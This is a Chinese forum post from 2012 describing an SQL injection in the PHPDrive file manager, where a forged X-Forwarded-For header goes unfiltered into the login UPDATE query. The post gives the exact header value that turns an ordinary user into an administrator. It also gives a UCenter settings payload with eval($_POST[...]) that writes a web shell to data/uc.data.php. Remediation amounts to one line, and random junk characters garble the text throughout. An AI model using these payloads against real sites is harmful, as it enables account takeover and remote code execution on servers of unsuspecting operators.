PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等
) F$ O5 y+ z$ f8 \8 J
* t6 K. d* Q* ]0 Yincludes/user.lib.php9 s$ D4 d! D7 z' z( S. x
行87
0 k- X. L. ]; f. {7 X4 @ function get_ip() {
6 l; }* C* R! |; C; [2 N0 o if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.! I7 R4 _9 o/ {5 e3 ?
在用户注册与登录 处module/disk/account.lead.php& M% h$ }: s4 t1 s* z
198行
, j& k: m+ T/ ^3 ? //更新本次登录IP和时间
, l# C, D$ U! N $db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生
0 r6 T9 w* }- Z" V由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限2 _) D. E) G* r: L8 P- ~+ O
实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.
0 z) G1 N, p" E3 l1 o* } N后台getshell:, _! D' j" ]2 l
在UCenter设置处,将UC数据库登录名填写为
5 ]% O6 c+ u( r- |+ a
5 T# f6 ~6 _9 e0 v! B2 [) a: s0 Kroot’);eval($_POST[DisKill]);?>/*
! W8 ]0 a- ]' a5 {3 ]" |可以得到一个shell,位置在 data/uc.data.php" |( H: H8 n2 u
- w3 f9 E8 I) O7 Y
修复:过滤注入
- k. H6 E. o: n) p- n, b2 [. Q; k8 o c' x
|
发表于 2012-12-31 09:18:34
收藏
支持
反对